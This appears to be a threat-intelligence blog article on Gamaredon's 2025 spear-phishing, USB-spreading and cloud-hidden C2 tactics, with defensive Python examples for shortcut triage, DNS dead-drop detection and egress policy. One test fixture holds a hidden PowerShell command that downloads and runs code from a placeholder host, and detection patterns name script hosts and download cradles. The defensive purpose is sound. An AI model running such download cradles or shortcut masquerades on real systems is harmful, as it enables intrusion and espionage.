ProBackend
ai national security

Boring and Brutal: How Russia's Gamaredon Scaled Its Spear-Phishing Pipeline

Analysis of ESET's 2025 report on the Gamaredon APT group: their downloader development, infrastructure obfuscation, and strategic collaborations.

Layla Okonkwo

Most security reports treat advanced persistent threat groups like digital wizards, painting them as wielding mythical zero-day exploits and writing elegant, kernel-level rootkits. Russia's Gamaredon group does not work that way. It is a volume shop. Think of it as a highly driven, slightly chaotic software development team that happens to be run by the Russian state: the Security Service of Ukraine (SBU) attributes Gamaredon to the 18th Center for Information Security of Russia's Federal Security Service (FSB). Its operators do not write beautiful, elegant exploits. They write sloppy script files and deploy them continuously, building a pipeline designed for raw throughput rather than craftsmanship.

In its 2025 report, ESET tracked 35 separate spear-phishing campaigns launched by the group against Ukrainian targets during the year. Thirty-five campaigns in a single calendar year is a massive operational tempo. Anyone who runs a data pipeline or manages deployments knows that keeping up that kind of velocity requires templates, automated tooling, and a persistent workforce. And the group's calendar betrays it as an ordinary state shop: ESET saw Gamaredon essentially go quiet for the whole of January 2025, with no campaigns and no visible development. Russian public holidays cluster heavily in early January, and these operators are, at the end of the day, government employees who clock out for the winter break. SREs know the feeling: nothing ships during a holiday freeze. Operations resumed in February 2025, and the first half of the year went into staging: building new downloaders and configuring the command-and-control (C2) infrastructure that paid off in the second half.

The targets remain highly specific: Ukrainian military units and government departments. The goal is straightforward espionage: siphoning documents and whatever text the operators can pull off the endpoint. The group does not need zero-days when a user will open an attachment. It uses phishing emails to drop basic scripts that pull down second- and third-stage payloads. It is a conveyor belt: if one downloader gets blocked, another is deployed. Let's look at how that conveyor belt functions on a technical level.

The High-Volume Phishing Engine

Inside PteroPaste and the PowerShell Toolkit

Sloppy code can still achieve complete network compromise if it executes. During the first two quarters of 2025, Gamaredon focused heavily on updating its toolkit, developing six new PowerShell-based downloaders: five written and deployed between January and March, a sixth arriving in the summer. Script-based downloaders are the group's bread and butter. They are cheap to write, easy to modify, and slip past basic signature detection with nothing more than a change of static strings. The standout addition to the 2025 toolkit, though, is a tool ESET calls PteroPaste.

PteroPaste is a downloader that does more than pull files: it also spreads over removable media and exfiltrates data. The script runs a loop that queries the system for attached USB storage drives. Once it finds one, it starts copying. It picks the name of a legitimate Word document from the user's local folders and writes its loader to the drive as a shortcut carrying that name plus a .lnk extension. It is a basic masquerade: Explorer never displays the .lnk suffix, even when "hide extensions for known file types" is switched off, so Budget.docx.lnk is listed as Budget.docx. A user looking at their thumb drive sees what looks like their thesis or budget file, clicks it, and the shortcut's target launches the PowerShell loader. MITRE ATT&CK files this under masquerading, but really it is exploiting the human habit of clicking familiar names.
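The shortcut trick above is easy to triage at a sanitization kiosk because the .lnk format is fully documented (MS-SHLLINK): the command line that runs on click lives in the file's StringData. The following is an added example, not code from ESET's report or from PteroPaste itself. It parses the header and StringData of a shell link, then scores a file on the indicators the paragraph describes (a document name with a .lnk tail, a script host as the target, PowerShell switches that hide the window). The sample shortcut it builds for itself is constructed for the demonstration; it is not a captured Gamaredon artifact, and the indicator regexes are this example's own choices, not a published signature.

```python
import re
import struct

# Shell Link header: HeaderSize (0x4C) followed by the fixed LinkCLSID
# {00021401-0000-0000-C000-000000000046} in its on-disk byte order.
LNK_MAGIC = b"\x4c\x00\x00\x00" + bytes.fromhex("0114020000000000c000000000000046")

# LinkFlags bits that decide which optional structures follow the header.
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO, HAS_NAME, HAS_RELATIVE_PATH = 0x01, 0x02, 0x04, 0x08
HAS_WORKING_DIR, HAS_ARGUMENTS, HAS_ICON_LOCATION, IS_UNICODE = 0x10, 0x20, 0x40, 0x80
STRING_FIELDS = ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
                 (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
                 (HAS_ICON_LOCATION, "icon_location"))
SW_SHOWMINNOACTIVE = 7  # ShowCommand value that starts the target minimized

# Triage heuristics (this example's own choices, not a published signature).
DOC_EXTENSIONS = (".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx", ".pdf", ".rtf")
SCRIPT_HOSTS = re.compile(r"\b(powershell|pwsh|mshta|wscript|cscript|cmd|rundll32)(\.exe)?\b", re.I)
HIDDEN_EXEC_ARGS = re.compile(
    r"(-w(indowstyle)?\s+hidden|-enc(odedcommand)?\b|-nop\b|-noni\b|downloadstring|\biex\b|invoke-expression)",
    re.I)
OFFICE_ICONS = re.compile(r"winword|excel|powerpnt|acrord32", re.I)


def parse_lnk(blob: bytes) -> dict:
    """Parse LinkFlags, ShowCommand and the StringData of an MS-SHLLINK file.
    ExtraData blocks after the strings are not needed for triage and are ignored."""
    if len(blob) < 0x4C or blob[:20] != LNK_MAGIC:
        raise ValueError("not a Windows shell link")
    flags = struct.unpack_from("<I", blob, 0x14)[0]
    fields = {"flags": flags, "show_command": struct.unpack_from("<I", blob, 0x3C)[0]}
    pos = 0x4C
    if flags & HAS_LINK_TARGET_ID_LIST:
        pos += 2 + struct.unpack_from("<H", blob, pos)[0]  # IDListSize excludes its own 2 bytes
    if flags & HAS_LINK_INFO:
        pos += struct.unpack_from("<I", blob, pos)[0]      # LinkInfoSize includes its own 4 bytes
    for flag, name in STRING_FIELDS:                       # fixed order per the spec
        if not flags & flag:
            continue
        count = struct.unpack_from("<H", blob, pos)[0]
        pos += 2
        if flags & IS_UNICODE:
            fields[name] = blob[pos:pos + 2 * count].decode("utf-16-le")
            pos += 2 * count
        else:
            fields[name] = blob[pos:pos + count].decode("cp1252", "replace")
            pos += count
    return fields


def triage_lnk(filename: str, blob: bytes) -> list:
    """Return the masquerade indicators present in a shortcut; an empty list means none matched."""
    fields = parse_lnk(blob)
    reasons = []
    lower = filename.lower()
    stem = lower[:-4] if lower.endswith(".lnk") else lower
    if stem.endswith(DOC_EXTENSIONS):
        reasons.append("double-extension")            # Budget.docx.lnk is shown as Budget.docx
    target = fields.get("relative_path", "") + " " + fields.get("working_dir", "")
    if SCRIPT_HOSTS.search(target):
        reasons.append("script-host-target")
    if HIDDEN_EXEC_ARGS.search(fields.get("arguments", "")):
        reasons.append("hidden-execution-args")
    if fields["show_command"] == SW_SHOWMINNOACTIVE:
        reasons.append("minimized-window")
    if OFFICE_ICONS.search(fields.get("icon_location", "")) and SCRIPT_HOSTS.search(target):
        reasons.append("office-icon-on-script-target")  # looks like Word, runs PowerShell
    return reasons


def build_sample_lnk(relative_path: str, arguments: str, icon_location: str, show_command: int = 1) -> bytes:
    """Assemble a minimal Unicode shell link (no ID list, no LinkInfo) so the parser can be exercised
    offline. This produces a constructed test artifact, not a captured sample."""
    flags = HAS_RELATIVE_PATH | HAS_ARGUMENTS | HAS_ICON_LOCATION | IS_UNICODE
    header = LNK_MAGIC + struct.pack("<IIQQQIIIHHII",
                                     flags, 0x20, 0, 0, 0,      # LinkFlags, FILE_ATTRIBUTE_ARCHIVE, 3 FILETIMEs
                                     0, 0, show_command,        # FileSize, IconIndex, ShowCommand
                                     0, 0, 0, 0)                # HotKey, Reserved1, Reserved2, Reserved3

    def string_data(s: str) -> bytes:
        return struct.pack("<H", len(s)) + s.encode("utf-16-le")

    return header + b"".join(string_data(s) for s in (relative_path, arguments, icon_location))


if __name__ == "__main__":
    # Constructed sample: named like a spreadsheet, launches a hidden PowerShell downloader.
    suspicious = build_sample_lnk(
        r"..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "-w hidden -nop -c \"iex (New-Object Net.WebClient).DownloadString('http://example.invalid/a')\"",
        r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
        show_command=SW_SHOWMINNOACTIVE)
    print(triage_lnk("Budget_2025.xlsx.lnk", suspicious))
```

Run it against every .lnk on incoming media before the drive is handed to a user; a shortcut with two or more of these indicators is worth a quarantine, and the arguments string gives the analyst the downloader URL without ever executing anything.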

Gamaredon relies on USB propagation for a practical engineering reason: air gaps. Military and government offices keep high-value assets off the internet. You cannot spear-phish an air-gapped system, but you can get a user to plug a compromised USB drive into it. Once inside, the script collects local data. For exfiltration, PteroPaste leans on Dropbox: it talks to the Dropbox API and uploads stolen data as ordinary HTTPS traffic. This is a nightmare for network operations. A traditional firewall sees legitimate-looking traffic to a trusted SaaS platform and lets it through; nobody blocks Dropbox because the business uses it. ESET notes that other Gamaredon stealer variants have been modified to exfiltrate directly to AWS S3 buckets. Riding these massive cloud providers lets the traffic blend into normal web browsing.

Defending against this requires hard restrictions, not just shiny monitoring dashboards. Jean-Ian Boutin, ESET's director of threat research, points out the obvious control: block non-administrative users from executing PowerShell entirely. If a public sector employee does not write scripts for their day job, their account should not be able to reach a scripting console. Restrict access to Windows Management Instrumentation (WMI) and disable scripting engines that are not actively required. Establish USB sanitization stations as well: isolated kiosks where external media is wiped or inspected before it touches a network-connected office system. Or better yet, disable the ports.


Tunneling, Dead Drops, and Trusted Cloud Abuses

Deploying malware is only half the battle. If your command-and-control servers get blocked, your campaign dies. Gamaredon's engineers spent the first half of 2025 redesigning their network architecture to evade blocklists. SREs put microservices behind load balancers and CDNs to keep systems online; Gamaredon puts its C2 behind the same kinds of services to keep its spyware talking.

They started using tunneling services, Microsoft Dev Tunnels and Cloudflare Tunnel among them, and built infrastructure on Cloudflare Workers, Cloudflare's serverless platform. These services let them expose endpoints behind legitimate, high-reputation IP space. When the malware resolves its C2, it does not look up a suspicious domain registered in Russia; it resolves a hostname served by Cloudflare, and the Worker or tunnel forwards the traffic to the real backend. Block the IP and you risk blocking large swaths of legitimate Cloudflare traffic. It is a clever shield.

To make blocklists even less useful, Gamaredon routes its C2 discovery through dead drops. The malware connects to a legitimate but compromised website, a public forum or a small business blog, to retrieve the current C2 address, which the operators have placed in a hidden comment or a profile description. The malware reads the page, pulls out the address, and only then contacts the real C2 server. In late 2025 the group started combining the two tactics, burying tunneling-service hostnames inside compromised web pages. An analyst tracking the traffic sees a call to a local garden center blog, then a call to Microsoft, then nothing. It looks like ordinary browsing.
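The sequence described in the last two paragraphs (an obscure site, then a tunneling-service hostname from the same host seconds later) is detectable even though neither lookup is blockable on its own. The following is an added example written for this article, not ESET's detection logic or anything from the report. It runs over a constructed batch of DNS log records and does two things: lists every resolution of a tunneling-service hostname, and flags the dead-drop chain, defined here as a host resolving a rarely-seen domain and then a tunneling-service hostname within a short window. The service suffixes are the public ones for Cloudflare Workers, Cloudflare quick tunnels and Microsoft Dev Tunnels; the allowlist, the hostnames and the log lines are assumptions made up for the demonstration.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Public hostname suffixes of the tunneling / edge-compute services named in the text.
# Tune for your environment: developers may use these legitimately.
TUNNEL_SUFFIXES = (".workers.dev", ".trycloudflare.com", ".devtunnels.ms")

# Assumption: a small allowlist of destinations the fleet resolves constantly.
KNOWN_GOOD = {"www.microsoft.com", "login.microsoftonline.com", "outlook.office.com"}

# Constructed DNS log, not real telemetry. ws-0412 shows the dead-drop pattern: an obscure blog
# is resolved, then two seconds later a Workers hostname. dev-7781 is a developer using Dev
# Tunnels: it should appear as a tunnel lookup but not as a dead-drop chain.
SAMPLE_DNS = [
    {"ts": "2025-10-14T09:00:01", "host": "ws-0412", "query": "login.microsoftonline.com"},
    {"ts": "2025-10-14T09:00:05", "host": "ws-0412", "query": "gardencenter-blog.example"},
    {"ts": "2025-10-14T09:00:07", "host": "ws-0412", "query": "quiet-lamp-1f3a.workers.dev"},
    {"ts": "2025-10-14T09:01:00", "host": "ws-0099", "query": "www.microsoft.com"},
    {"ts": "2025-10-14T09:02:00", "host": "dev-7781", "query": "abc123-8080.euw.devtunnels.ms"},
    {"ts": "2025-10-14T09:05:00", "host": "ws-0099", "query": "outlook.office.com"},
]


def classify(domain: str) -> str:
    """Bucket a queried name: tunnel-service, known-good, or other."""
    d = domain.lower().rstrip(".")
    if d.endswith(TUNNEL_SUFFIXES):
        return "tunnel-service"
    if d in KNOWN_GOOD:
        return "known-good"
    return "other"


def find_tunnel_lookups(records):
    """Every resolution of a tunneling-service hostname, regardless of what preceded it."""
    return [(r["host"], r["query"].lower()) for r in records
            if classify(r["query"]) == "tunnel-service"]


def find_dead_drop_chains(records, window_seconds=60, rare_threshold=2):
    """Flag a host that resolves a rarely-seen domain and, within the window, a tunneling-service
    hostname. A domain is 'rare' when no more than rare_threshold distinct hosts in the batch
    resolved it; that is a crude prevalence baseline, so feed it a representative batch."""
    recs = sorted(records, key=lambda r: r["ts"])
    hosts_per_domain = defaultdict(set)
    by_host = defaultdict(list)
    for r in recs:
        hosts_per_domain[r["query"].lower()].add(r["host"])
        by_host[r["host"]].append(r)
    alerts = []
    for host, seq in by_host.items():
        for i, r in enumerate(seq):
            if classify(r["query"]) != "tunnel-service":
                continue
            t = datetime.fromisoformat(r["ts"])
            for prev in reversed(seq[:i]):          # walk backwards while inside the window
                if t - datetime.fromisoformat(prev["ts"]) > timedelta(seconds=window_seconds):
                    break
                q = prev["query"].lower()
                if classify(q) == "other" and len(hosts_per_domain[q]) <= rare_threshold:
                    alerts.append({"host": host, "ts": r["ts"], "dead_drop": q,
                                   "tunnel": r["query"].lower()})
                    break
    return alerts


if __name__ == "__main__":
    for a in find_dead_drop_chains(SAMPLE_DNS):
        print(f"{a['ts']} {a['host']}: dead drop {a['dead_drop']} -> tunnel {a['tunnel']}")
```

The tunnel-lookup list is the cheap win: on a fleet of government workstations that never legitimately uses Workers or Dev Tunnels, any hit is worth a ticket. The chain detector is what separates the developer's Dev Tunnels session from the implant fetching its C2 address from a compromised blog.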

This infrastructure shift breaks traditional perimeter security. Louis Eichenbaum, federal CTO at ColorTokens, notes that we can no longer trust traffic simply because it terminates at a safe provider: Dropbox, AWS, and Cloudflare are not malicious, but the accounts sending traffic to them might be. SREs know you cannot rely on network zoning alone. You need granular, identity-aware microsegmentation: track application workflows and ensure that only authorized workloads can reach the internet at all. If a document converter service starts opening outbound connections to AWS S3 or Dropbox, your telemetry should fire instantly. The job is understanding the data pipeline and defining what normal looks like, rather than maintaining a static list of bad IPs.
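Two controls in this section, the "PowerShell talking to Dropbox" problem from the PteroPaste discussion and the "document converter talking to S3" problem just above, come down to the same check: judge a connection by who is making it, not by where it goes. The following is an added example, not code from the report or from any product named on this page. It learns a per-identity egress baseline from a trusted observation window, denies anything outside it, and separately flags a script host reaching cloud storage even when that destination is permitted for the workload (the Dropbox-is-allowed-because-the-business-uses-it case). The identities, processes, hostnames and events are constructed for the demonstration.

```python
from collections import defaultdict

# Processes that have no business driving uploads to cloud storage from a user workstation.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe", "cmd.exe"}
CLOUD_STORAGE_SUFFIXES = (".dropboxapi.com", ".dropbox.com", ".amazonaws.com")

# Constructed events, not real telemetry. 'identity' is the workload the connection is attributed
# to (service account, host group, tag); 'process' is the image that opened the socket.
TRAINING = [
    {"identity": "doc-converter", "process": "converter.exe", "dest": "files.internal.example"},
    {"identity": "doc-converter", "process": "converter.exe", "dest": "ocsp.digicert.com"},
    {"identity": "workstation", "process": "outlook.exe", "dest": "outlook.office.com"},
    {"identity": "workstation", "process": "dropbox.exe", "dest": "content.dropboxapi.com"},
]
OBSERVED = [
    {"identity": "doc-converter", "process": "converter.exe", "dest": "files.internal.example"},
    {"identity": "doc-converter", "process": "converter.exe", "dest": "s3.amazonaws.com"},
    {"identity": "workstation", "process": "powershell.exe", "dest": "content.dropboxapi.com"},
]


def learn_policy(events):
    """Derive 'normal' per identity from a trusted observation window: the destinations each
    workload actually needed. Everything outside that set is denied by default."""
    policy = defaultdict(set)
    for e in events:
        policy[e["identity"]].add(e["dest"].lower())
    return dict(policy)


def evaluate(events, policy):
    """Return a finding per violated rule. A single event can trip both rules."""
    findings = []
    for e in events:
        dest = e["dest"].lower()
        # Rule 1: identity-aware default deny. The converter has never needed S3, so S3 is denied
        # for it even though S3 is a perfectly reputable destination elsewhere in the estate.
        if dest not in policy.get(e["identity"], set()):
            findings.append({"rule": "egress-not-in-policy", **e})
        # Rule 2: the destination may be allowed for the workload (Dropbox is business-approved on
        # workstations), but a script host is the wrong thing to be talking to it.
        if e["process"].lower() in SCRIPT_HOSTS and dest.endswith(CLOUD_STORAGE_SUFFIXES):
            findings.append({"rule": "script-host-to-cloud-storage", **e})
    return findings


if __name__ == "__main__":
    for f in evaluate(OBSERVED, learn_policy(TRAINING)):
        print(f"{f['rule']}: {f['identity']} / {f['process']} -> {f['dest']}")
```

In a real deployment the learned set becomes the enforced egress policy of the segment, not just a detection; the point of the example is that the policy is keyed on identity, so "traffic to AWS" is neither good nor bad until you know which workload sent it.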

Tactical Turla Partnerships and Remediation

Gamaredon is not acting alone. The second half of 2025 saw it team up with another notorious Russian state-sponsored group: Turla (also tracked as Snake, Venomous Bear, Waterbug, or Uroburos). Turla is a higher-tier intelligence unit that writes clean, complex implants and runs long-term operations demanding high operational security. Whereas China-nexus groups often focus on stealthy, long-term persistence, such as UNC6508's year-long undetected spying or UNC5221's persistent access campaigns, Russian operations like Gamaredon run at a much higher frequency, acting in effect as initial access brokers.

In this partnership, Gamaredon is the delivery pipeline. It sends the spear-phishing emails, compromises the endpoint, and establishes initial persistence. Once it has a foothold, it drops loaders that deploy Turla's Kazuar framework. Kazuar is a modular .NET backdoor with dozens of commands covering stealthy execution, detection evasion, and cryptographic protection of the data it handles. An SRE would call this modular outsourcing: Gamaredon is the transport layer, Turla is the database engine, and dividing the labor makes both more efficient. The defensive corollary is that the delivery pipeline, not the polished implant, is the cheapest place to break the chain: if the sloppy downloader never runs, Kazuar never arrives.

Defending against this requires real structural shifts in IT administration. It starts with blocking script execution. Non-administrative users do not need command prompts, PowerShell, or WMI scripting. If your users operate purely in web browsers and productivity software, lock down what can execute on their machines. One caveat: PowerShell's ExecutionPolicy setting is not a security boundary (Microsoft's own documentation says so, and a single command-line switch bypasses it); the enforceable control is an application allowlist such as AppLocker or Windows Defender Application Control, which also puts any PowerShell that does run into Constrained Language Mode. Second, USB security is no longer optional. Ban unvetted drives or set up sanitization stations; if you cannot scan a drive at the boundary, do not let it touch a workstation. Finally, microsegmentation is the only way to stop the lateral movement of tools like Kazuar. A single compromised endpoint should not be able to talk to the rest of the subnet. Keep it isolated, monitor the logs, and build pipelines that treat internal traffic with the same skepticism as external traffic.
